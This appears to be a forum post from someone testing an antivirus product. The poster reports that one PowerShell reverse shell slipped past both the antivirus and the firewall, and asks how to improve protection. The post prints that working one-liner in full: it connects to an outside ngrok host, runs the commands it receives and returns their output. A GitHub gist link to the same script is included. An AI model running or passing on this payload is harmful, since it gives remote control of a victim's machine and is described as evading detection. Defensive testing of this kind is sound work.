Hello,
I went to test the antivirus by creating several malicious payloads and it detected them all, but it did not detect a malicious payload of reverse shell in PowerShell. The firewall didn't stop the reverse shell either.
Antivirus detected other reverse shell scripts in powershell, but not this one.
$client = New-Object System.Net.Sockets.TCPClient('0.tcp.sa.ngrok.io',11248);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Also tested reverse shell on port 1234.
GitHub link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
What should I do to further improve antivirus protection in this case?
